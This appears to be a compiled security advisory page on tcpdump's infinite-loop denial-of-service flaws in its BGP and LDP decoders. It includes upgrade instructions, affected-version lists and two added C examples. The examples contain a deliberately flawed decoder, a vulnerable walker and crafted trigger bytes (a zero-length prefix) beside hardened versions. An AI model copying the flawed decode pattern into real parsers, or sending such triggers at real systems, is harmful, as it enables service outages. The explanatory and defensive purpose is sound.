  1  net-analyzer/tcpdump     < 3.8.3-r2                   >= 3.8.3-r2

Description
===========

TCPDump improperly handles and decodes ISIS, BGP, LDP (CAN-2005-1279)
and RSVP (CAN-2005-1280) packets. TCPDump might loop endlessly after
receiving malformed packets.

Impact
======

A malicious remote attacker can exploit the decoding issues for a
Denial of Service attack by sending specially crafted packets, possibly
causing TCPDump to loop endlessly.

Workaround
==========

There is no known workaround at this time.

Resolution
==========

All TCPDump users should upgrade to the latest available version:

    # emerge --sync
    # emerge --ask --oneshot --verbose ">=net-analyzer/tcpdump-3.8.3-r2"

References
==========

  [ 1 ] CAN-2005-1279
        http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=2005-1279
  [ 2 ] CAN-2005-1280
        http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=2005-1280

Availability
============

This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:

  http://security.gentoo.org/glsa/glsa-200505-06.xml

Concerns?
=========

Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users' machines is of utmost
importance to us. Any security concerns should be addressed to
security@gentoo.org or alternatively, you may file a bug at
http://bugs.gentoo.org.

License
=======

Copyright 2005 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).

The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.

http://creativecommons.org/licenses/by-sa/2.0

- Vulnerability information

15863
tcpdump BGP RT_ROUTING_INFO Malformed Packet DoS
Remote / Network Access Denial of Service
Loss of Availability
Exploit Public

- Vulnerability description

tcpdump contains a flaw that may allow a remote denial of service. The issue is triggered when handling Border Gateway Protocol (BGP) packets. By sending a malformed BGP packet, a remote attacker could cause the application to enter an infinite loop resulting in a loss of availability.
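The defect class behind both decoders named on this page (the BGP RT_ROUTING_INFO path and the LDP ldp_print loop) is a decode loop that steps through a packet by a length the element decoder itself reports, with no check that each step actually moves forward or stays inside the buffer. The following is an added example written for this page; it is not tcpdump's code and not the project's fix. It uses a hypothetical prefix-list layout (one prefix-length byte in bits, then ceil(plen/8) prefix bytes, a simplification of BGP NLRI) and shows the hardened walk loop next to a correct element decoder and a deliberately flawed one that reports a zero advance for a zero-length prefix, so the loop guard can be seen terminating instead of spinning. The same two checks apply to any message-length or TLV loop. All sample byte arrays are constructed, not captured traffic.

```c
/* Added example (not tcpdump's code): a hardened length-driven decode loop.
 * Hypothetical element layout: 1 byte prefix length in bits, then
 * ceil(plen/8) bytes of prefix. */
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>

/* Negative results from the walker and the decoders. */
enum walk_status { WALK_TRUNCATED = -1, WALK_NO_PROGRESS = -2 };

/* An element decoder reports how many bytes the element at buf occupies,
 * or a negative status if the element does not fit in `remaining`. */
typedef long (*element_decoder)(const uint8_t *buf, size_t remaining);

/* Correct decoder: counts the length byte plus the prefix bytes. */
long decode_prefix(const uint8_t *buf, size_t remaining)
{
    if (remaining < 1) return WALK_TRUNCATED;
    size_t plen_bytes = ((size_t)buf[0] + 7) / 8;
    if (remaining - 1 < plen_bytes) return WALK_TRUNCATED; /* prefix overruns buffer */
    return (long)(1 + plen_bytes);
}

/* Flawed decoder (the defect pattern): forgets the length byte it consumed,
 * so a legal zero-bit prefix yields an advance of 0. A loop without a
 * progress check would re-decode the same byte forever. */
long decode_prefix_flawed(const uint8_t *buf, size_t remaining)
{
    if (remaining < 1) return WALK_TRUNCATED;
    size_t plen_bytes = ((size_t)buf[0] + 7) / 8;
    if (remaining - 1 < plen_bytes) return WALK_TRUNCATED;
    return (long)plen_bytes;
}

/* Hardened loop. Returns the number of elements decoded, or a negative
 * walk_status. The remaining length lives in size_t and is recomputed from
 * the offset each pass, so it can never go negative or wrap. */
int walk_prefix_list(const uint8_t *buf, size_t len, element_decoder dec)
{
    size_t off = 0;
    int count = 0;
    while (off < len) {
        size_t remaining = len - off;
        long advance = dec(buf + off, remaining);
        if (advance < 0) return WALK_TRUNCATED;                  /* check 1: element fits */
        if (advance == 0) return WALK_NO_PROGRESS;               /* check 2: loop moves forward */
        if ((size_t)advance > remaining) return WALK_TRUNCATED;  /* check 1 against an over-reporting decoder */
        off += (size_t)advance;
        count++;
    }
    return count;
}

/* Constructed samples (not captured packets). */
static const uint8_t SAMPLE_LIST[]  = { 0x18, 0x0a, 0x00, 0x00,   /* /24 prefix 10.0.0 */
                                        0x08, 0xc0,               /* /8  prefix 192    */
                                        0x00 };                   /* /0  zero-length   */
static const uint8_t SAMPLE_ZERO[]  = { 0x00 };                   /* single zero-length element */
static const uint8_t SAMPLE_TRUNC[] = { 0x20, 0x0a, 0x00 };       /* /32 claimed, only 2 bytes present */

int demo_list_correct(void) { return walk_prefix_list(SAMPLE_LIST,  sizeof SAMPLE_LIST,  decode_prefix); }
int demo_zero_correct(void) { return walk_prefix_list(SAMPLE_ZERO,  sizeof SAMPLE_ZERO,  decode_prefix); }
int demo_zero_flawed(void)  { return walk_prefix_list(SAMPLE_ZERO,  sizeof SAMPLE_ZERO,  decode_prefix_flawed); }
int demo_truncated(void)    { return walk_prefix_list(SAMPLE_TRUNC, sizeof SAMPLE_TRUNC, decode_prefix); }

int main(void)
{
    printf("list, correct decoder : %d elements\n", demo_list_correct());
    printf("zero, correct decoder : %d elements\n", demo_zero_correct());
    printf("zero, flawed decoder  : status %d (no progress, loop stopped)\n", demo_zero_flawed());
    printf("truncated input       : status %d\n", demo_truncated());
    return 0;
}
```

The point of the arrangement is that the guard lives in the loop, not in the decoder: a decoder bug like the flawed variant is still contained, and a crafted element can at worst end the walk early rather than hang the process.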

- Timeline

2005-04-26 Unknown
2005-04-26 Unknown

- Solution

Upgrade to version CVS-Current or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.

- References

- Vulnerability Author

- Vulnerability Information

Title: tcpdump LDP Decoding Routines Denial Of Service Vulnerability
Class: Failure to Handle Exceptional Conditions
Bugtraq ID: 13389
Remote: Yes
Local: No
Published: 2005-04-26 12:00:00
Updated: 2009-06-23 07:19:00
Credit: Discovery of this issue is credited to Vade 79 <v9@fakehalo.us>.

- Affected Program Versions

Turbolinux Turbolinux Server 10.0
Turbolinux Appliance Server 1.0 Workgroup Edition
Turbolinux Appliance Server 1.0 Hosting Edition
Trustix Secure Linux 2.2
Trustix Secure Linux 2.1
Trustix Secure Enterprise Linux 2.0
SuSE SUSE Linux Enterprise Server 8
+ Linux kernel 2.4.21
+ Linux kernel 2.4.19
SGI ProPack 3.0
SCO Unixware 7.1.4
SCO Unixware 7.1.3 up
SCO Unixware 7.1.3
SCO Open Server 6.0
S.u.S.E. SuSE Linux Standard Server 8.0
S.u.S.E. SuSE Linux School Server for i386
S.u.S.E. SUSE LINUX Retail Solution 8.0
S.u.S.E. SuSE Linux Openexchange Server 4.0
S.u.S.E. Open-Enterprise-Server 9.0
S.u.S.E. Novell Linux Desktop 9.0
S.u.S.E. Linux Professional 9.3 x86_64
S.u.S.E. Linux Professional 9.3
S.u.S.E. Linux Professional 9.2 x86_64
S.u.S.E. Linux Professional 9.2
S.u.S.E. Linux Professional 9.1 x86_64
S.u.S.E. Linux Professional 9.1
S.u.S.E. Linux Professional 9.0 x86_64
S.u.S.E. Linux Professional 9.0
S.u.S.E. Linux Professional 8.2
S.u.S.E. Linux Personal 9.3 x86_64
S.u.S.E. Linux Personal 9.3
S.u.S.E. Linux Personal 9.2 x86_64
S.u.S.E. Linux Personal 9.2
S.u.S.E. Linux Personal 9.1 x86_64
S.u.S.E. Linux Personal 9.1
S.u.S.E. Linux Personal 9.0 x86_64
S.u.S.E. Linux Personal 9.0
S.u.S.E. Linux Personal 8.2
S.u.S.E. Linux Enterprise Server 9
S.u.S.E. Linux Desktop 1.0
RedHat Linux 9.0 i386
RedHat Enterprise Linux WS 4
RedHat Enterprise Linux ES 4
RedHat Desktop 4.0
Red Hat Fedora Core3
Red Hat Fedora Core2
Red Hat Fedora Core1
Red Hat Enterprise Linux AS 4
NetBSD NetBSD Current
NetBSD NetBSD 4.0
Mandriva Linux Mandrake 10.2 x86_64
Mandriva Linux Mandrake 10.2
Mandriva Linux Mandrake 10.1 x86_64
Mandriva Linux Mandrake 10.1
Mandriva Linux Mandrake 10.0 AMD64
MandrakeSoft Corporate Server 3.0 x86_64
MandrakeSoft Corporate Server 3.0
LBL tcpdump 3.8.3
+ Debian Linux 3.1 sparc
+ Debian Linux 3.1 s/390
+ Debian Linux 3.1 ppc
+ Debian Linux 3.1 mipsel
+ Debian Linux 3.1 mips
+ Debian Linux 3.1 m68k
+ Debian Linux 3.1 ia-64
+ Debian Linux 3.1 ia-32
+ Debian Linux 3.1 hppa
+ Debian Linux 3.1 arm
+ Debian Linux 3.1 amd64
+ Debian Linux 3.1 alpha
+ Debian Linux 3.1
+ Turbolinux Appliance Server 1.0 Workgroup Edition
+ Turbolinux Appliance Server 1.0 Hosting Edition
+ Turbolinux Appliance Server Hosting Edition 1.0
+ Turbolinux Appliance Server Workgroup Edition 1.0
+ Turbolinux Home
+ Turbolinux Turbolinux 10 F...
+ Turbolinux Turbolinux Desktop 10.0
+ Turbolinux Turbolinux Server 8.0
+ Turbolinux Turbolinux Server 7.0
+ Turbolinux Turbolinux Workstation 8.0
+ Turbolinux Turbolinux Workstation 7.0
+ Ubuntu Ubuntu Linux 5.0 4 powerpc
+ Ubuntu Ubuntu Linux 5.0 4 i386
+ Ubuntu Ubuntu Linux 5.0 4 amd64
+ Ubuntu Ubuntu Linux 4.1 ppc
+ Ubuntu Ubuntu Linux 4.1 ia64
+ Ubuntu Ubuntu Linux 4.1 ia32
LBL tcpdump 3.8.2
LBL tcpdump 3.8.1
+ Mandriva Linux Mandrake 10.0
LBL tcpdump 3.7.2
+ MandrakeSoft Corporate Server 2.1 x86_64
+ MandrakeSoft Corporate Server 2.1
+ MandrakeSoft Multi Network Firewall 2.0
+ Mandriva Linux Mandrake 9.2 amd64
+ Mandriva Linux Mandrake 9.2
+ Mandriva Linux Mandrake 9.1 ppc
+ Mandriva Linux Mandrake 9.1
+ Turbolinux Turbolinux Advanced Server 6.0
+ Turbolinux Turbolinux Desktop 10.0
+ Turbolinux Turbolinux Server 8.0
+ Turbolinux Turbolinux Server 7.0
+ Turbolinux Turbolinux Server 6.5
+ Turbolinux Turbolinux Server 6.1
+ Turbolinux Turbolinux Workstation 8.0
+ Turbolinux Turbolinux Workstation 7.0
+ Turbolinux Turbolinux Workstation 6.1
+ Turbolinux Turbolinux Workstation 6.0
LBL tcpdump 3.7.1
+ FreeBSD FreeBSD 4.7 -RELEASE
+ FreeBSD FreeBSD 4.7
+ Gentoo Linux 1.4 _rc2
+ Gentoo Linux 1.4 _rc1
+ S.u.S.E. Linux 8.1
LBL tcpdump 3.7
+ FreeBSD FreeBSD 4.6 -RELEASE
+ FreeBSD FreeBSD 4.6
+ FreeBSD FreeBSD 4.5 -STABLE
+ FreeBSD FreeBSD 4.5 -RELEASE
+ FreeBSD FreeBSD 4.5
+ FreeBSD FreeBSD 4.4 -STABLE
+ FreeBSD FreeBSD 4.4 -RELENG
+ FreeBSD FreeBSD 4.4
+ FreeBSD FreeBSD 4.3 -STABLE
+ FreeBSD FreeBSD 4.3 -RELENG
+ FreeBSD FreeBSD 4.3 -RELEASE
+ FreeBSD FreeBSD 4.3
+ FreeBSD FreeBSD 4.2 -STABLE
+ FreeBSD FreeBSD 4.2 -RELEASE
+ FreeBSD FreeBSD 4.2
LBL tcpdump 3.6.3
LBL tcpdump 3.6.2
+ Caldera OpenLinux Server 3.1.1
+ Caldera OpenLinux Server 3.1
+ Caldera OpenLinux Workstation 3.1.1
+ Caldera OpenLinux Workstation 3.1
+ Conectiva Linux 8.0
+ Conectiva Linux 7.0
+ Conectiva Linux 6.0
+ Conectiva Linux 5.1
+ Conectiva Linux 5.0
+ Debian Linux 3.0 sparc
+ Debian Linux 3.0 s/390
+ Debian Linux 3.0 ppc
+ Debian Linux 3.0 mipsel
+ Debian Linux 3.0 mips
+ Debian Linux 3.0 m68k
+ Debian Linux 3.0 ia-64
+ Debian Linux 3.0 ia-32
+ Debian Linux 3.0 hppa
+ Debian Linux 3.0 arm
+ Debian Linux 3.0 alpha
+ Debian Linux 3.0
+ FreeBSD FreeBSD 4.3
+ FreeBSD FreeBSD 4.2
+ FreeBSD FreeBSD 4.1.1
+ FreeBSD FreeBSD 4.1
+ FreeBSD FreeBSD 4.0
+ HP Secure OS software for Linux 1.0
+ MandrakeSoft Corporate Server 1.0.1
+ MandrakeSoft Single Network Firewall 7.2
+ Mandriva Linux Mandrake 8.2
+ Mandriva Linux Mandrake 8.1
+ Mandriva Linux Mandrake 8.0
+ Mandriva Linux Mandrake 7.2
+ Mandriva Linux Mandrake 7.1
+ RedHat Linux 7.2 ia64
+ RedHat Linux 7.2 i386
+ RedHat Linux 7.1 ia64
+ RedHat Linux 7.1 i386
+ RedHat Linux 7.1 alpha
+ RedHat Linux 7.0 i386
+ RedHat Linux 7.0 alpha
+ RedHat Linux 6.2 sparc
+ RedHat Linux 6.2 i386
+ RedHat Linux 6.2 alpha
+ S.u.S.E. Linux 8.0
+ Trustix Secure Linux 1.5
+ Trustix Secure Linux 1.2
+ Trustix Secure Linux 1.1
LBL tcpdump 3.5.2
LBL tcpdump 3.5 alpha
LBL tcpdump 3.5
LBL tcpdump 3.4 a6
+ Debian Linux 2.2 sparc
+ Debian Linux 2.2 powerpc
+ Debian Linux 2.2 IA-32
+ Debian Linux 2.2 arm
+ Debian Linux 2.2 alpha
+ Debian Linux 2.2 68k
+ Debian Linux 2.2
+ S.u.S.E. Firewall Adminhost VPN
+ S.u.S.E. Linux 7.2
+ S.u.S.E. Linux 7.1
+ S.u.S.E. Linux 7.0
+ S.u.S.E. Linux 6.4
+ S.u.S.E. Linux Admin-CD for Firewall
+ S.u.S.E. Linux Connectivity Server
+ S.u.S.E. Linux Database Server 0
+ S.u.S.E. Linux Enterprise Server for S/390
+ S.u.S.E. Linux Live-CD for Firewall
+ S.u.S.E. SuSE eMail Server III
+ SuSE SUSE Linux Enterprise Server 7
LBL tcpdump 3.4
+ RedHat Linux 7.1 ia64
+ RedHat Linux 7.1 i386
+ RedHat Linux 7.1 alpha
+ RedHat Linux 7.0 i386
+ RedHat Linux 7.0 alpha
+ RedHat Linux 6.2 sparc
+ RedHat Linux 6.2 i386
+ RedHat Linux 6.2 alpha
IPCop IPCop 1.4.5
IPCop IPCop 1.4.4
IPCop IPCop 1.4.2
IPCop IPCop 1.4.1
Gentoo Linux
FreeBSD FreeBSD 5.4 -RELENG
FreeBSD FreeBSD 5.4 -RELEASE
FreeBSD FreeBSD 5.4 -PRERELEASE
FreeBSD FreeBSD 5.3 -STABLE
FreeBSD FreeBSD 5.3 -RELENG
FreeBSD FreeBSD 5.3 -RELEASE
FreeBSD FreeBSD 5.3
FreeBSD FreeBSD 5.2.1 -RELEASE
FreeBSD FreeBSD 5.2 -RELENG
FreeBSD FreeBSD 5.2 -RELEASE
FreeBSD FreeBSD 5.2
FreeBSD FreeBSD 5.1 -RELENG
FreeBSD FreeBSD 5.1 -RELEASE/Alpha
FreeBSD FreeBSD 5.1 -RELEASE-p5
FreeBSD FreeBSD 5.1 -RELEASE
FreeBSD FreeBSD 5.1
FreeBSD FreeBSD 5.0 -RELENG
FreeBSD FreeBSD 5.0 -RELEASE-p14
FreeBSD FreeBSD 5.0 alpha
FreeBSD FreeBSD 5.0
F5 BigIP 4.6.5
F5 BigIP 4.6.3
F5 BigIP 4.6.2
F5 BigIP 4.6
F5 BigIP 4.5.12
F5 BigIP 4.5.11
F5 BigIP 4.5.10
F5 BigIP 4.5.9
F5 BigIP 4.5.6
F5 BigIP 4.5
F5 BigIP 4.4
F5 BigIP 4.3
F5 BigIP 4.2
F5 BigIP 4.0
F5 3-DNS 4.6.3
F5 3-DNS 4.6.2
F5 3-DNS 4.6
F5 3-DNS 4.5.12
F5 3-DNS 4.5.11
F5 3-DNS 4.5
F5 3-DNS 4.4
F5 3-DNS 4.3
F5 3-DNS 4.2
Avaya S8710 R2.0.1
Avaya S8710 R2.0.0
Avaya S8700 R2.0.1
Avaya S8700 R2.0.0
Avaya S8500 R2.0.1
Avaya S8500 R2.0.0
Avaya S8300 R2.0.1
Avaya S8300 R2.0.0
Avaya Modular Messaging (MSS) 2.0
Avaya Modular Messaging (MSS) 1.1
Avaya MN100
Avaya Intuity LX
Avaya Converged Communications Server 2.0

- Unaffected Program Versions

F5 BigIP 4.7
F5 BigIP 4.5.13
F5 3-DNS 4.7
F5 3-DNS 4.5.13

- Vulnerability Discussion

The 'tcpdump' utility is prone to a vulnerability that may allow a remote attacker to cause a denial-of-service condition in the software. The issue occurs because of the way tcpdump decodes Label Distribution Protocol (LDP) datagrams. A remote attacker may send malformed LDP datagrams to cause the software to enter an infinite loop and hang.

This issue affects tcpdump 3.8.3 and earlier.
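Both halves of this advisory (the BGP RT_ROUTING_INFO case above and the LDP ldp_print case discussed here) are the same bug class: a decoder loop whose cursor advances by a packet-supplied amount, and a crafted value that makes that amount zero. The following is an added example, not tcpdump's code, modelled on the route-target NLRI layout (one prefix-length octet followed by ceil(plen/8) prefix octets); the assumption that a prefix length of 0 is the zero-advance trigger, the 96-bit upper bound, the function names and the sample payloads are all constructed for this illustration. The vulnerable walker takes a step limit purely so the stall can be shown without hanging the caller; the hardened walker refuses any non-positive advance, so it terminates after at most `len` iterations.

```c
#include <stddef.h>
#include <stdint.h>

/*
 * Constructed route-target NLRI item layout (assumption for this example):
 * one octet giving the prefix length in bits, then ceil(plen / 8) octets of
 * prefix.  96 bits (4-octet origin AS + 8-octet route target) is the
 * assumed maximum.
 */
#define RT_MAX_PLEN_BITS 96

/* Vulnerable decoder, modelled on the pre-fix pattern: a zero prefix length
 * is treated as "nothing to decode" and reported as zero octets consumed,
 * even though the length octet itself was read. */
static int decode_rt_item_vulnerable(const uint8_t *p, size_t avail)
{
    if (avail < 1)
        return -1;
    uint8_t plen = p[0];
    if (plen == 0)
        return 0;                       /* BUG: caller adds 0 and never advances */
    size_t nbytes = (plen + 7u) / 8u;
    if (1 + nbytes > avail)
        return -1;                      /* truncated item */
    return (int)(1 + nbytes);
}

/* Hardened decoder: the length octet always counts, the prefix length is
 * range-checked, and the result is either an error or strictly positive. */
static int decode_rt_item_hardened(const uint8_t *p, size_t avail)
{
    if (avail < 1)
        return -1;
    uint8_t plen = p[0];
    if (plen > RT_MAX_PLEN_BITS)
        return -1;                      /* impossible prefix length */
    size_t nbytes = (plen + 7u) / 8u;   /* 0 for the zero-length (default) prefix */
    if (1 + nbytes > avail)
        return -1;                      /* truncated item */
    return (int)(1 + nbytes);
}

/* Vulnerable walker: advances by whatever the decoder returns, so a
 * zero-length item pins the cursor in place.  max_steps is a demonstration
 * guard only (not part of the vulnerable pattern).  Returns the item count,
 * -1 for a truncated packet, -2 when progress stalled. */
int walk_rt_nlri_vulnerable(const uint8_t *pkt, size_t len, unsigned max_steps)
{
    const uint8_t *p = pkt, *end = pkt + len;
    int count = 0;
    unsigned steps = 0;

    while (p < end) {
        if (++steps > max_steps)
            return -2;                  /* would otherwise loop forever */
        int advance = decode_rt_item_vulnerable(p, (size_t)(end - p));
        if (advance == -1)
            return -1;
        p += advance;                   /* advance == 0: infinite loop */
        count++;
    }
    return count;
}

/* Hardened walker: any advance that is not strictly positive is treated as
 * malformed input and ends the loop, so termination is guaranteed. */
int walk_rt_nlri_hardened(const uint8_t *pkt, size_t len)
{
    const uint8_t *p = pkt, *end = pkt + len;
    int count = 0;

    while (p < end) {
        int advance = decode_rt_item_hardened(p, (size_t)(end - p));
        if (advance <= 0)
            return -1;                  /* malformed: stop, do not spin */
        p += advance;
        count++;
    }
    return count;
}

/* Constructed sample payloads (not captured traffic). */
/* Two well-formed items: a 96-bit prefix (12 octets) and a 32-bit prefix (4 octets). */
const uint8_t RT_NLRI_GOOD[] = {
    96, 0x00, 0x00, 0xfd, 0xe8, 0x00, 0x02, 0xfd, 0xe8, 0x00, 0x00, 0x00, 0x01,
    32, 0x00, 0x00, 0xfd, 0xe9
};
/* One item with prefix length 0: the crafted trigger. */
const uint8_t RT_NLRI_ZERO[] = { 0 };
/* Truncated: claims 96 bits but only 3 octets follow. */
const uint8_t RT_NLRI_SHORT[] = { 96, 0x00, 0x00, 0xfd };
```

On the well-formed payload both walkers agree, which is why the defect survived ordinary traffic; only the single-octet zero-length item separates them. The fix is not to reject the zero-length prefix (it is a legal encoding) but to account for the octet that was actually consumed and to make the loop refuse to continue on a non-positive advance.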

- Exploit

The following exploits are available:

- Solution

Reportedly, the vendor has addressed this vulnerability in alpha 3.9.x / CVS releases of tcpdump, but this is not confirmed.

Please see the referenced vendor advisories for more information.


Turbolinux Appliance Server 1.0 Workgroup Edition
IPCop IPCop 1.4.1
IPCop IPCop 1.4.4
Mandriva Linux Mandrake 10.0 AMD64
Turbolinux Turbolinux Server 10.0
Mandriva Linux Mandrake 10.1 x86_64
Mandriva Linux Mandrake 10.1
MandrakeSoft Corporate Server 3.0
LBL tcpdump 3.7.2
LBL tcpdump 3.8.2
LBL tcpdump 3.8.3
FreeBSD FreeBSD 5.3
FreeBSD FreeBSD 5.3 -STABLE
FreeBSD FreeBSD 5.4 -RELENG
SCO Open Server 6.0
SCO Unixware 7.1.4

- References

About the SCAP Chinese Community

The SCAP Chinese Community is the first Chinese-language open community in China devoted to SCAP. For more information, see [About this site].

Copyright Notice

CVE/CWE/OVAL are registered trademarks of MITRE Corporation; their official data sources are kept on MITRE's websites.